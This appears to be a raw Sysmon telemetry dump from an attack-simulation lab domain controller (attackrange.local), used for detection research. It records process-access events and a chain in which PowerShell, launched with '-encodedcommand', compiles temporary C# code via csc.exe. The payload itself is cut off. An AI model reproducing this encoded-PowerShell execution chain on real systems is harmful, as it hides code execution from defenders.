13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004636Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004635Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004634Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004633Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004632Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004631Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A3-5FCF-EB00-000000009101}3136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004630Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004629Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-85A3-5FCF-EA00-000000009101}43244744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-85A3-5FCF-EB00-000000009101}3136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004628Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.463{10ACEC4A-85A3-5FCF-EB00-000000009101}3136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES9F19.tmp" "c:\Users\Administrator\AppData\Local\Temp\hinonazn\CSCF42031CD7C140A09C25C94F9AF6225.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-85A3-5FCF-EA00-000000009101}4324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\hinonazn\hinonazn.cmdline" 10341000x80000000000000004627Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A3-5FCF-EA00-000000009101}4324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004626Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004625Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004624Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004623Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004622Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004621Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004620Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004619Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004618Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004617Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A3-5FCF-EA00-000000009101}4324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004616Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.393{10ACEC4A-85A2-5FCF-E700-000000009101}25604296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A3-5FCF-EA00-000000009101}4324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|UNKNOWN(0000017548F00421)|UNKNOWN(0000017548F00421)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662773bc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64) 154100x80000000000000004615Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.402{10ACEC4A-85A3-5FCF-EA00-000000009101}4324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\hinonazn\hinonazn.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 